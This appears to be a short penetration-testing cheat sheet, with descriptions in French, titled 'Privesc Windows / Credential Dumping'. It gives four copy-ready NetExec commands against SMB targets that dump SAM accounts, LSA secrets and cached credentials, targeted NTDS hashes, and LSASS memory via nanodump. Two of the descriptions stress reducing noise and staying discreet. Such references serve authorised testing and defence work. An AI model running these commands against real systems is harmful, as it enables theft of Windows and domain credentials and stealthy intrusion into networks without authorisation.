Privesc Windows

Credential Dumping

Copy command
nxc smb $TARGET -u $USER -p $PASS --sam

Description: Dump des comptes locaux (SAM).

Copy command
nxc smb $TARGET -u $USER -p $PASS --lsa

Description: Extraire secrets LSA et creds cache.

Copy command
nxc smb $TARGET -u $USER -p $PASS --ntds --user $TARGET_USER

Description: Dump NTDS ciblé pour limiter le bruit.

Copy command
nxc smb $TARGET -u $USER -p $PASS -M nanodump

Description: Dump LSASS avec meilleure discrétion que dump classique.